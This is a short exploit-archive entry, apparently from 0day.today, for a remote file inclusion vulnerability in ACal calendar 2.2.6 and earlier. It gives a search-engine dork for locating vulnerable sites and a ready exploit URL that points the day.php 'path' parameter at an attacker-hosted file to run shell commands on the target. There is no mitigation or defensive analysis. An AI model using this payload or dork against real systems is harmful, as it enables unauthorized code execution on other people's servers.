id: 406
date: 05/06/2006
title: ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
author: PiNGuX
cves: 

===========================================================
ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
===========================================================





$*******************************************$
$ Title: ACal 2.2.6 <= Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$

Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls



#  0day.today [2023-03-27]  #